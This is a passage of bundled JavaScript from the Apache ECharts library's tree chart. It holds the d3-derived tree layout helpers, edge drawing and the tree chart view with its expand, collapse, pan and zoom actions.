{module:echarts/data/Tree~TreeNode}\n */\nfunction apportion(subtreeV, subtreeW, ancestor, separation) {\n\n    if (subtreeW) {\n        var nodeOutRight = subtreeV;\n        var nodeInRight = subtreeV;\n        var nodeOutLeft = nodeInRight.parentNode.children[0];\n        var nodeInLeft = subtreeW;\n\n        var sumOutRight = nodeOutRight.hierNode.modifier;\n        var sumInRight = nodeInRight.hierNode.modifier;\n        var sumOutLeft = nodeOutLeft.hierNode.modifier;\n        var sumInLeft = nodeInLeft.hierNode.modifier;\n\n        while (nodeInLeft = nextRight(nodeInLeft), nodeInRight = nextLeft(nodeInRight), nodeInLeft && nodeInRight) {\n            nodeOutRight = nextRight(nodeOutRight);\n            nodeOutLeft = nextLeft(nodeOutLeft);\n            nodeOutRight.hierNode.ancestor = subtreeV;\n            var shift = nodeInLeft.hierNode.prelim + sumInLeft - nodeInRight.hierNode.prelim\n                    - sumInRight + separation(nodeInLeft, nodeInRight);\n            if (shift > 0) {\n                moveSubtree(nextAncestor(nodeInLeft, subtreeV, ancestor), subtreeV, shift);\n                sumInRight += shift;\n                sumOutRight += shift;\n            }\n            sumInLeft += nodeInLeft.hierNode.modifier;\n            sumInRight += nodeInRight.hierNode.modifier;\n            sumOutRight += nodeOutRight.hierNode.modifier;\n            sumOutLeft += nodeOutLeft.hierNode.modifier;\n        }\n        if (nodeInLeft && !nextRight(nodeOutRight)) {\n            nodeOutRight.hierNode.thread = nodeInLeft;\n            nodeOutRight.hierNode.modifier += sumInLeft - sumOutRight;\n\n        }\n        if (nodeInRight && !nextLeft(nodeOutLeft)) {\n            nodeOutLeft.hierNode.thread = nodeInRight;\n            nodeOutLeft.hierNode.modifier += sumInRight - sumOutLeft;\n            ancestor = subtreeV;\n        }\n    }\n    return ancestor;\n}\n\n/**\n * This function is used to traverse the right contour of a subtree.\n * It returns the rightmost child of node or the thread of node. The function\n * returns null if and only if node is on the highest depth of its subtree.\n *\n * @param  {module:echarts/data/Tree~TreeNode} node\n * @return {module:echarts/data/Tree~TreeNode}\n */\nfunction nextRight(node) {\n    var children = node.children;\n    return children.length && node.isExpand ? children[children.length - 1] : node.hierNode.thread;\n}\n\n/**\n * This function is used to traverse the left contour of a subtree (or a subforest).\n * It returns the leftmost child of node or the thread of node. The function\n * returns null if and only if node is on the highest depth of its subtree.\n *\n * @param  {module:echarts/data/Tree~TreeNode} node\n * @return {module:echarts/data/Tree~TreeNode}\n */\nfunction nextLeft(node) {\n    var children = node.children;\n    return children.length && node.isExpand ? children[0] : node.hierNode.thread;\n}\n\n/**\n * If nodeInLeft’s ancestor is a sibling of node, returns nodeInLeft’s ancestor.\n * Otherwise, returns the specified ancestor.\n *\n * @param  {module:echarts/data/Tree~TreeNode} nodeInLeft\n * @param  {module:echarts/data/Tree~TreeNode} node\n * @param  {module:echarts/data/Tree~TreeNode} ancestor\n * @return {module:echarts/data/Tree~TreeNode}\n */\nfunction nextAncestor(nodeInLeft, node, ancestor) {\n    return nodeInLeft.hierNode.ancestor.parentNode === node.parentNode\n        ? nodeInLeft.hierNode.ancestor : ancestor;\n}\n\n/**\n * The implementation of this function was originally copied from \"d3.js\"\n * <https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js>\n * with some modifications made for this program.\n * See the license statement at the head of this file.\n *\n * Shifts the current subtree rooted at wr.\n * This is done by increasing prelim(w+) and modifier(w+) by shift.\n *\n * @param  {module:echarts/data/Tree~TreeNode} wl\n * @param  {module:echarts/data/Tree~TreeNode} wr\n * @param  {number} shift [description]\n */\nfunction moveSubtree(wl, wr, shift) {\n    var change = shift / (wr.hierNode.i - wl.hierNode.i);\n    wr.hierNode.change -= change;\n    wr.hierNode.shift += shift;\n    wr.hierNode.modifier += shift;\n    wr.hierNode.prelim += shift;\n    wl.hierNode.change += change;\n}\n\n/**\n * The implementation of this function was originally copied from \"d3.js\"\n * <https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js>\n * with some modifications made for this program.\n * See the license statement at the head of this file.\n */\nfunction defaultSeparation(node1, node2) {\n    return node1.parentNode === node2.parentNode ? 1 : 2;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar TreeShape = extendShape({\n    shape: {\n        parentPoint: [],\n        childPoints: [],\n        orient: '',\n        forkPosition: ''\n    },\n\n    style: {\n        stroke: '#000',\n        fill: null\n    },\n\n    buildPath: function (ctx, shape) {\n        var childPoints = shape.childPoints;\n        var childLen = childPoints.length;\n        var parentPoint = shape.parentPoint;\n        var firstChildPos = childPoints[0];\n        var lastChildPos = childPoints[childLen - 1];\n\n        if (childLen === 1) {\n            ctx.moveTo(parentPoint[0], parentPoint[1]);\n            ctx.lineTo(firstChildPos[0], firstChildPos[1]);\n            return;\n        }\n\n        var orient = shape.orient;\n        var forkDim = (orient === 'TB' || orient === 'BT') ? 0 : 1;\n        var otherDim = 1 - forkDim;\n        var forkPosition = parsePercent$1(shape.forkPosition, 1);\n        var tmpPoint = [];\n        tmpPoint[forkDim] = parentPoint[forkDim];\n        tmpPoint[otherDim] = parentPoint[otherDim] + (lastChildPos[otherDim] - parentPoint[otherDim]) * forkPosition;\n\n        ctx.moveTo(parentPoint[0], parentPoint[1]);\n        ctx.lineTo(tmpPoint[0], tmpPoint[1]);\n        ctx.moveTo(firstChildPos[0], firstChildPos[1]);\n        tmpPoint[forkDim] = firstChildPos[forkDim];\n        ctx.lineTo(tmpPoint[0], tmpPoint[1]);\n        tmpPoint[forkDim] = lastChildPos[forkDim];\n        ctx.lineTo(tmpPoint[0], tmpPoint[1]);\n        ctx.lineTo(lastChildPos[0], lastChildPos[1]);\n\n        for (var i = 1; i < childLen - 1; i++) {\n            var point = childPoints[i];\n            ctx.moveTo(point[0], point[1]);\n            tmpPoint[forkDim] = point[forkDim];\n            ctx.lineTo(tmpPoint[0], tmpPoint[1]);\n        }\n    }\n});\n\nextendChartView({\n\n    type: 'tree',\n\n    /**\n     * Init the chart\n     * @override\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     */\n    init: function (ecModel, api) {\n\n        /**\n         * @private\n         * @type {module:echarts/data/Tree}\n         */\n        this._oldTree;\n\n        /**\n         * @private\n         * @type {module:zrender/container/Group}\n         */\n        this._mainGroup = new Group();\n\n        /**\n         * @private\n         * @type {module:echarts/componet/helper/RoamController}\n         */\n        this._controller = new RoamController(api.getZr());\n\n        this._controllerHost = {target: this.group};\n\n        this.group.add(this._mainGroup);\n    },\n\n    render: function (seriesModel, ecModel, api, payload) {\n        var data = seriesModel.getData();\n\n        var layoutInfo = seriesModel.layoutInfo;\n\n        var group = this._mainGroup;\n\n        var layout = seriesModel.get('layout');\n\n        if (layout === 'radial') {\n            group.attr('position', [layoutInfo.x + layoutInfo.width / 2, layoutInfo.y + layoutInfo.height / 2]);\n        }\n        else {\n            group.attr('position', [layoutInfo.x, layoutInfo.y]);\n        }\n\n        this._updateViewCoordSys(seriesModel, layoutInfo, layout);\n        this._updateController(seriesModel, ecModel, api);\n\n        var oldData = this._data;\n\n        var seriesScope = {\n            expandAndCollapse: seriesModel.get('expandAndCollapse'),\n            layout: layout,\n            edgeShape: seriesModel.get('edgeShape'),\n            edgeForkPosition: seriesModel.get('edgeForkPosition'),\n            orient: seriesModel.getOrient(),\n            curvature: seriesModel.get('lineStyle.curveness'),\n            symbolRotate: seriesModel.get('symbolRotate'),\n            symbolOffset: seriesModel.get('symbolOffset'),\n            hoverAnimation: seriesModel.get('hoverAnimation'),\n            useNameLabel: true,\n            fadeIn: true\n        };\n\n        data.diff(oldData)\n            .add(function (newIdx) {\n                if (symbolNeedsDraw$1(data, newIdx)) {\n                    // Create node and edge\n                    updateNode(data, newIdx, null, group, seriesModel, seriesScope);\n                }\n            })\n            .update(function (newIdx, oldIdx) {\n                var symbolEl = oldData.getItemGraphicEl(oldIdx);\n                if (!symbolNeedsDraw$1(data, newIdx)) {\n                    symbolEl && removeNode(oldData, oldIdx, symbolEl, group, seriesModel, seriesScope);\n                    return;\n                }\n                // Update node and edge\n                updateNode(data, newIdx, symbolEl, group, seriesModel, seriesScope);\n            })\n            .remove(function (oldIdx) {\n                var symbolEl = oldData.getItemGraphicEl(oldIdx);\n                // When remove a collapsed node of subtree, since the collapsed\n                // node haven't been initialized with a symbol element,\n                // you can't found it's symbol element through index.\n                // so if we want to remove the symbol element we should insure\n                // that the symbol element is not null.\n                if (symbolEl) {\n                    removeNode(oldData, oldIdx, symbolEl, group, seriesModel, seriesScope);\n                }\n            })\n            .execute();\n\n        this._nodeScaleRatio = seriesModel.get('nodeScaleRatio');\n\n        this._updateNodeAndLinkScale(seriesModel);\n\n        if (seriesScope.expandAndCollapse === true) {\n            data.eachItemGraphicEl(function (el, dataIndex) {\n                el.off('click').on('click', function () {\n                    api.dispatchAction({\n                        type: 'treeExpandAndCollapse',\n                        seriesId: seriesModel.id,\n                        dataIndex: dataIndex\n                    });\n                });\n            });\n        }\n        this._data = data;\n    },\n\n    _updateViewCoordSys: function (seriesModel) {\n        var data = seriesModel.getData();\n        var points = [];\n        data.each(function (idx) {\n            var layout = data.getItemLayout(idx);\n            if (layout && !isNaN(layout.x) && !isNaN(layout.y)) {\n                points.push([+layout.x, +layout.y]);\n            }\n        });\n        var min = [];\n        var max = [];\n        fromPoints(points, min, max);\n\n        // If don't Store min max when collapse the root node after roam,\n        // the root node will disappear.\n        var oldMin = this._min;\n        var oldMax = this._max;\n\n        // If width or height is 0\n        if (max[0] - min[0] === 0) {\n            min[0] = oldMin ? oldMin[0] : min[0] - 1;\n            max[0] = oldMax ? oldMax[0] : max[0] + 1;\n        }\n        if (max[1] - min[1] === 0) {\n            min[1] = oldMin ? oldMin[1] : min[1] - 1;\n            max[1] = oldMax ? oldMax[1] : max[1] + 1;\n        }\n\n        var viewCoordSys = seriesModel.coordinateSystem = new View();\n        viewCoordSys.zoomLimit = seriesModel.get('scaleLimit');\n\n        viewCoordSys.setBoundingRect(min[0], min[1], max[0] - min[0], max[1] - min[1]);\n\n        viewCoordSys.setCenter(seriesModel.get('center'));\n        viewCoordSys.setZoom(seriesModel.get('zoom'));\n\n        // Here we use viewCoordSys just for computing the 'position' and 'scale' of the group\n        this.group.attr({\n            position: viewCoordSys.position,\n            scale: viewCoordSys.scale\n        });\n\n        this._viewCoordSys = viewCoordSys;\n        this._min = min;\n        this._max = max;\n    },\n\n    _updateController: function (seriesModel, ecModel, api) {\n        var controller = this._controller;\n        var controllerHost = this._controllerHost;\n        var group = this.group;\n        controller.setPointerChecker(function (e, x, y) {\n            var rect = group.getBoundingRect();\n            rect.applyTransform(group.transform);\n            return rect.contain(x, y)\n                && !onIrrelevantElement(e, api, seriesModel);\n        });\n\n        controller.enable(seriesModel.get('roam'));\n        controllerHost.zoomLimit = seriesModel.get('scaleLimit');\n        controllerHost.zoom = seriesModel.coordinateSystem.getZoom();\n\n        controller\n            .off('pan')\n            .off('zoom')\n            .on('pan', function (e) {\n                updateViewOnPan(controllerHost, e.dx, e.dy);\n                api.dispatchAction({\n                    seriesId: seriesModel.id,\n                    type: 'treeRoam',\n                    dx: e.dx,\n                    dy: e.dy\n                });\n            }, this)\n            .on('zoom', function (e) {\n                updateViewOnZoom(controllerHost, e.scale, e.originX, e.originY);\n                api.dispatchAction({\n                    seriesId: seriesModel.id,\n                    type: 'treeRoam',\n                    zoom: e.scale,\n                    originX: e.originX,\n                    originY: e.originY\n                });\n                this._updateNodeAndLinkScale(seriesModel);\n            }, this);\n    },\n\n    _updateNodeAndLinkScale: function (seriesModel) {\n        var data = seriesModel.getData();\n\n        var nodeScale = this._getNodeGlobalScale(seriesModel);\n        var invScale = [nodeScale, nodeScale];\n\n        data.eachItemGraphicEl(function (el, idx) {\n            el.attr('scale', invScale);\n        });\n    },\n\n    _getNodeGlobalScale: function (seriesModel) {\n        var coordSys = seriesModel.coordinateSystem;\n        if (coordSys.type !== 'view') {\n            return 1;\n        }\n\n        var nodeScaleRatio = this._nodeScaleRatio;\n\n        var groupScale = coordSys.scale;\n        var groupZoom = (groupScale && groupScale[0]) || 1;\n        // Scale node when zoom changes\n        var roamZoom = coordSys.getZoom();\n        var nodeScale = (roamZoom - 1) * nodeScaleRatio + 1;\n\n        return nodeScale / groupZoom;\n    },\n\n    dispose: function () {\n        this._controller && this._controller.dispose();\n        this._controllerHost = {};\n    },\n\n    remove: function () {\n        this._mainGroup.removeAll();\n        this._data = null;\n    }\n\n});\n\nfunction symbolNeedsDraw$1(data, dataIndex) {\n    var layout = data.getItemLayout(dataIndex);\n\n    return layout\n        && !isNaN(layout.x) && !isNaN(layout.y)\n        && data.getItemVisual(dataIndex, 'symbol') !== 'none';\n}\n\nfunction getTreeNodeStyle(node, itemModel, seriesScope) {\n    seriesScope.itemModel = itemModel;\n    seriesScope.itemStyle = itemModel.getModel('itemStyle').getItemStyle();\n    seriesScope.hoverItemStyle = itemModel.getModel('emphasis.itemStyle').getItemStyle();\n    seriesScope.lineStyle = itemModel.getModel('lineStyle').getLineStyle();\n    seriesScope.labelModel = itemModel.getModel('label');\n    seriesScope.hoverLabelModel = itemModel.getModel('emphasis.label');\n\n    if (node.isExpand === false && node.children.length !== 0) {\n        seriesScope.symbolInnerColor = seriesScope.itemStyle.fill;\n    }\n    else {\n        seriesScope.symbolInnerColor = '#fff';\n    }\n\n    return seriesScope;\n}\n\nfunction updateNode(data, dataIndex, symbolEl, group, seriesModel, seriesScope) {\n    var isInit = !symbolEl;\n    var node = data.tree.getNodeByDataIndex(dataIndex);\n    var itemModel = node.getModel();\n    var seriesScope = getTreeNodeStyle(node, itemModel, seriesScope);\n    var virtualRoot = data.tree.root;\n\n    var source = node.parentNode === virtualRoot ? node : node.parentNode || node;\n    var sourceSymbolEl = data.getItemGraphicEl(source.dataIndex);\n    var sourceLayout = source.getLayout();\n    var sourceOldLayout = sourceSymbolEl\n        ? {\n            x: sourceSymbolEl.position[0],\n            y: sourceSymbolEl.position[1],\n            rawX: sourceSymbolEl.__radialOldRawX,\n            rawY: sourceSymbolEl.__radialOldRawY\n        }\n        : sourceLayout;\n    var targetLayout = node.getLayout();\n\n    if (isInit) {\n        symbolEl = new SymbolClz$1(data, dataIndex, seriesScope);\n        symbolEl.attr('position', [sourceOldLayout.x, sourceOldLayout.y]);\n    }\n    else {\n        symbolEl.updateData(data, dataIndex, seriesScope);\n    }\n\n    symbolEl.__radialOldRawX = symbolEl.__radialRawX;\n    symbolEl.__radialOldRawY = symbolEl.__radialRawY;\n    symbolEl.__radialRawX = targetLayout.rawX;\n    symbolEl.__radialRawY = targetLayout.rawY;\n\n    group.add(symbolEl);\n    data.setItemGraphicEl(dataIndex, symbolEl);\n    updateProps(symbolEl, {\n        position: [targetLayout.x, targetLayout.y]\n    }, seriesModel);\n\n    var symbolPath = symbolEl.getSymbolPath();\n\n    if (seriesScope.layout === 'radial') {\n        var realRoot = virtualRoot.children[0];\n        var rootLayout = realRoot.getLayout();\n        var length = realRoot.children.length;\n        var rad;\n        var isLeft;\n\n        if (targetLayout.x === rootLayout.x && node.isExpand === true) {\n            var center = {};\n            center.x = (realRoot.children[0].getLayout().x + realRoot.children[length - 1].getLayout().x) / 2;\n            center.y = (realRoot.children[0].getLayout().y + realRoot.children[length - 1].getLayout().y) / 2;\n            rad = Math.atan2(center.y - rootLayout.y, center.x - rootLayout.x);\n            if (rad < 0) {\n                rad = Math.PI * 2 + rad;\n            }\n            isLeft = center.x < rootLayout.x;\n            if (isLeft) {\n                rad = rad - Math.PI;\n            }\n        }\n        else {\n            rad = Math.atan2(targetLayout.y - rootLayout.y, targetLayout.x - rootLayout.x);\n            if (rad < 0) {\n                rad = Math.PI * 2 + rad;\n            }\n            if (node.children.length === 0 || (node.children.length !== 0 && node.isExpand === false)) {\n                isLeft = targetLayout.x < rootLayout.x;\n                if (isLeft) {\n                    rad = rad - Math.PI;\n                }\n            }\n            else {\n                isLeft = targetLayout.x > rootLayout.x;\n                if (!isLeft) {\n                    rad = rad - Math.PI;\n                }\n            }\n        }\n\n        var textPosition = isLeft ? 'left' : 'right';\n        var rotate = seriesScope.labelModel.get('rotate');\n        var labelRotateRadian = rotate * (Math.PI / 180);\n\n        symbolPath.setStyle({\n            textPosition: seriesScope.labelModel.get('position') || textPosition,\n            textRotation: rotate == null ? -rad : labelRotateRadian,\n            textOrigin: 'center',\n            verticalAlign: 'middle'\n        });\n    }\n\n    drawEdge(\n        seriesModel, node, virtualRoot, symbolEl, sourceOldLayout,\n        sourceLayout, targetLayout, group, seriesScope\n    );\n\n}\n\nfunction drawEdge(\n    seriesModel, node, virtualRoot, symbolEl, sourceOldLayout,\n    sourceLayout, targetLayout, group, seriesScope\n) {\n\n    var edgeShape = seriesScope.edgeShape;\n    var edge = symbolEl.__edge;\n    if (edgeShape === 'curve') {\n        if (node.parentNode && node.parentNode !== virtualRoot) {\n            if (!edge) {\n                edge = symbolEl.__edge = new BezierCurve({\n                    shape: getEdgeShape(seriesScope, sourceOldLayout, sourceOldLayout),\n                    style: defaults({opacity: 0, strokeNoScale: true}, seriesScope.lineStyle)\n                });\n            }\n\n            updateProps(edge, {\n                shape: getEdgeShape(seriesScope, sourceLayout, targetLayout),\n                style: {opacity: 1}\n            }, seriesModel);\n        }\n    }\n    else if (edgeShape === 'polyline') {\n        if (seriesScope.layout === 'orthogonal') {\n            if (node !== virtualRoot && node.children && (node.children.length !== 0) && (node.isExpand === true)) {\n                var children = node.children;\n                var childPoints = [];\n                for (var i = 0; i < children.length; i++) {\n                    var childLayout = children[i].getLayout();\n                    childPoints.push([childLayout.x, childLayout.y]);\n                }\n\n                if (!edge) {\n                    edge = symbolEl.__edge = new TreeShape({\n                        shape: {\n                            parentPoint: [targetLayout.x, targetLayout.y],\n                            childPoints: [[targetLayout.x, targetLayout.y]],\n                            orient: seriesScope.orient,\n                            forkPosition: seriesScope.edgeForkPosition\n                        },\n                        style: defaults({opacity: 0, strokeNoScale: true}, seriesScope.lineStyle)\n                    });\n                }\n                updateProps(edge, {\n                    shape: {\n                        parentPoint: [targetLayout.x, targetLayout.y],\n                        childPoints: childPoints\n                    },\n                    style: {opacity: 1}\n                }, seriesModel);\n            }\n        }\n        else {\n            if (__DEV__) {\n                throw new Error('The polyline edgeShape can only be used in orthogonal layout');\n            }\n        }\n    }\n    group.add(edge);\n}\n\nfunction removeNode(data, dataIndex, symbolEl, group, seriesModel, seriesScope) {\n    var node = data.tree.getNodeByDataIndex(dataIndex);\n    var virtualRoot = data.tree.root;\n    var itemModel = node.getModel();\n    var seriesScope = getTreeNodeStyle(node, itemModel, seriesScope);\n\n    var source = node.parentNode === virtualRoot ? node : node.parentNode || node;\n    var edgeShape = seriesScope.edgeShape;\n    var sourceLayout;\n    while (sourceLayout = source.getLayout(), sourceLayout == null) {\n        source = source.parentNode === virtualRoot ? source : source.parentNode || source;\n    }\n\n    updateProps(symbolEl, {\n        position: [sourceLayout.x + 1, sourceLayout.y + 1]\n    }, seriesModel, function () {\n        group.remove(symbolEl);\n        data.setItemGraphicEl(dataIndex, null);\n    });\n\n    symbolEl.fadeOut(null, {keepLabel: true});\n\n    var sourceSymbolEl = data.getItemGraphicEl(source.dataIndex);\n    var sourceEdge = sourceSymbolEl.__edge;\n\n    // 1. when expand the sub tree, delete the children node should delete the edge of\n    // the source at the same time. because the polyline edge shape is only owned by the source.\n    // 2.when the node is the only children of the source, delete the node should delete the edge of\n    // the source at the same time. the same reason as above.\n    var edge = symbolEl.__edge\n        || ((source.isExpand === false || source.children.length === 1) ? sourceEdge : undefined);\n\n    var edgeShape = seriesScope.edgeShape;\n\n    if (edge) {\n        if (edgeShape === 'curve') {\n            updateProps(edge, {\n                shape: getEdgeShape(seriesScope, sourceLayout, sourceLayout),\n                style: {\n                    opacity: 0\n                }\n            }, seriesModel, function () {\n                group.remove(edge);\n            });\n        }\n        else if (edgeShape === 'polyline' && seriesScope.layout === 'orthogonal') {\n            updateProps(edge, {\n                shape: {\n                    parentPoint: [sourceLayout.x, sourceLayout.y],\n                    childPoints: [[sourceLayout.x, sourceLayout.y]]\n                },\n                style: {\n                    opacity: 0\n                }\n            }, seriesModel, function () {\n                group.remove(edge);\n            });\n        }\n    }\n}\n\nfunction getEdgeShape(seriesScope, sourceLayout, targetLayout) {\n    var cpx1;\n    var cpy1;\n    var cpx2;\n    var cpy2;\n    var orient = seriesScope.orient;\n    var x1;\n    var x2;\n    var y1;\n    var y2;\n\n    if (seriesScope.layout === 'radial') {\n        x1 = sourceLayout.rawX;\n        y1 = sourceLayout.rawY;\n        x2 = targetLayout.rawX;\n        y2 = targetLayout.rawY;\n\n        var radialCoor1 = radialCoordinate(x1, y1);\n        var radialCoor2 = radialCoordinate(x1, y1 + (y2 - y1) * seriesScope.curvature);\n        var radialCoor3 = radialCoordinate(x2, y2 + (y1 - y2) * seriesScope.curvature);\n        var radialCoor4 = radialCoordinate(x2, y2);\n\n        return {\n            x1: radialCoor1.x,\n            y1: radialCoor1.y,\n            x2: radialCoor4.x,\n            y2: radialCoor4.y,\n            cpx1: radialCoor2.x,\n            cpy1: radialCoor2.y,\n            cpx2: radialCoor3.x,\n            cpy2: radialCoor3.y\n        };\n    }\n    else {\n        x1 = sourceLayout.x;\n        y1 = sourceLayout.y;\n        x2 = targetLayout.x;\n        y2 = targetLayout.y;\n\n        if (orient === 'LR' || orient === 'RL') {\n            cpx1 = x1 + (x2 - x1) * seriesScope.curvature;\n            cpy1 = y1;\n            cpx2 = x2 + (x1 - x2) * seriesScope.curvature;\n            cpy2 = y2;\n        }\n        if (orient === 'TB' || orient === 'BT') {\n            cpx1 = x1;\n            cpy1 = y1 + (y2 - y1) * seriesScope.curvature;\n            cpx2 = x2;\n            cpy2 = y2 + (y1 - y2) * seriesScope.curvature;\n        }\n    }\n\n    return {\n        x1: x1,\n        y1: y1,\n        x2: x2,\n        y2: y2,\n        cpx1: cpx1,\n        cpy1: cpy1,\n        cpx2: cpx2,\n        cpy2: cpy2\n    };\n\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterAction({\n    type: 'treeExpandAndCollapse',\n    event: 'treeExpandAndCollapse',\n    update: 'update'\n}, function (payload, ecModel) {\n    ecModel.eachComponent({mainType: 'series', subType: 'tree', query: payload}, function (seriesModel) {\n        var dataIndex = payload.dataIndex;\n        var tree = seriesModel.getData().tree;\n        var node = tree.getNodeByDataIndex(dataIndex);\n        node.isExpand = !node.isExpand;\n    });\n});\n\nregisterAction({\n    type: 'treeRoam',\n    event: 'treeRoam',\n    // Here we set 'none' instead of 'update', because roam action\n    // just need to update the transform matrix without having to recalculate\n    // the layout. So don't need to go through the whole update process, such\n    // as 'dataPrcocess', 'coordSystemUpdate', 'layout' and so on.\n    update: 'none'\n}, function (payload, ecModel) {\n    ecModel.eachComponent({mainType: 'series', subType: 'tree', query: payload}, function (seriesModel) {\n        var coordSys = seriesModel.coordinateSystem;\n        var res = updateCenterAndZoom(coordSys, payload);\n\n        seriesModel.setCenter\n            && seriesModel.setCenter(res.center);\n\n        seriesModel.setZoom\n            && seriesModel.setZoom(res.zoom);\n    });\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\n/**\n * Traverse the tree from bottom to top and do something\n * @param  {module:echarts/data/Tree~TreeNode} root  The real root of the tree\n * @param  {Function} callback\n */\nfunction eachAfter(root, callback, separation) {\n    var nodes = [root];\n    var next = [];\n    var node;\n\n    while (node = nodes.pop()) { // jshint ignore:line\n        next.push(node);\n        if (node.isExpand) {\n            var children = node.children;\n            if (children.length) {\n                for (var i = 0; i < children.length; i++) {\n                    nodes.push(children[i]);\n                }\n            }\n        }\n    }\n\n    while (node = next.pop()) { // jshint ignore:line\n        callback(node, separation);\n    }\n}\n\n/**\n * Traverse the tree from top to bottom and do something\n * @param  {module:echarts/data/Tree~TreeNode} root  The real root of the tree\n * @param  {Function} callback\n */\nfunction eachBefore(root, callback) {\n    var nodes = [root];\n    var node;\n    while (node = nodes.pop()) { // jshint ignore:line\n        callback(node);\n        if (node.isExpand) {\n            var children = node.children;\n            if (children.length) {\n                for (var i = children.length - 1; i >= 0; i--) {\n                    nodes.push(children[i]);\n                }\n            }\n        }\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar treeLayout = function (ecModel, api) {\n    ecModel.eachSeriesByType('tree', function (seriesModel) {\n        commonLayout(seriesModel, api);\n    });\n};\n\nfunction commonLayout(seriesModel, api) {\n    var layoutInfo = getViewRect$1(seriesModel, api);\n    seriesModel.layoutInfo = layoutInfo;\n    var layout = seriesModel.get('layout');\n    var width = 0;\n    var height = 0;\n    var separation$$1 = null;\n\n    if (layout === 'radial') {\n        width = 2 * Math.PI;\n        height = Math.min(layoutInfo.height, layoutInfo.width) / 2;\n        separation$$1 = separation(function (node1, node2) {\n            return (node1.parentNode === node2.parentNode ? 1 : 2) / node1.depth;\n        });\n    }\n    else {\n        width = layoutInfo.width;\n        height = layoutInfo.height;\n        separation$$1 = separation();\n    }\n\n    var virtualRoot = seriesModel.getData().tree.root;\n    var realRoot = virtualRoot.children[0];\n\n    if (realRoot) {\n        init$2(virtualRoot);\n        eachAfter(realRoot, firstWalk, separation$$1);\n        virtualRoot.hierNode.modifier = -realRoot.hierNode.prelim;\n        eachBefore(realRoot, secondWalk);\n\n        var left = realRoot;\n        var right = realRoot;\n        var bottom = realRoot;\n        eachBefore(realRoot, function (node) {\n            var x = node.getLayout().x;\n            if (x < left.getLayout().x) {\n                left = node;\n            }\n            if (x > right.getLayout().x) {\n                right = node;\n            }\n            if (node.depth > bottom.depth) {\n                bottom = node;\n            }\n        });\n\n        var delta = left === right ? 1 : separation$$1(left, right) / 2;\n        var tx = delta - left.getLayout().x;\n        var kx = 0;\n        var ky = 0;\n        var coorX = 0;\n        var coorY = 0;\n        if (layout === 'radial') {\n            kx = width / (right.getLayout().x + delta + tx);\n            // here we use (node.depth - 1), bucause the real root's depth is 1\n            ky = height / ((bottom.depth - 1) || 1);\n            eachBefore(realRoot, function (node) {\n                coorX = (node.getLayout().x + tx) * kx;\n                coorY = (node.depth - 1) * ky;\n                var finalCoor = radialCoordinate(coorX, coorY);\n                node.setLayout({x: finalCoor.x, y: finalCoor.y, rawX: coorX, rawY: coorY}, true);\n            });\n        }\n        else {\n            var orient = seriesModel.getOrient();\n            if (orient === 'RL' || orient === 'LR') {\n                ky = height / (right.getLayout().x + delta + tx);\n                kx = width / ((bottom.depth - 1) || 1);\n                eachBefore(realRoot, function (node) {\n                    coorY = (node.getLayout().x + tx) * ky;\n                    coorX = orient === 'LR'\n                        ? (node.depth - 1) * kx\n                        : width - (node.depth - 1) * kx;\n                    node.setLayout({x: coorX, y: coorY}, true);\n                });\n            }\n            else if (orient === 'TB' || orient === 'BT') {\n                kx = width / (right.getLayout().x + delta + tx);\n                ky = height / ((bottom.depth - 1) || 1);\n                eachBefore(realRoot, function (node) {\n                    coorX = (node.getLayout().x + tx) * kx;\n                    coorY = orient === 'TB'\n                        ? (node.depth - 1) * ky\n                        : height - (node.depth - 1) * ky;\n                    node.setLayout({x: coorX, y: coorY}, true);\n                });\n            }\n        }\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the 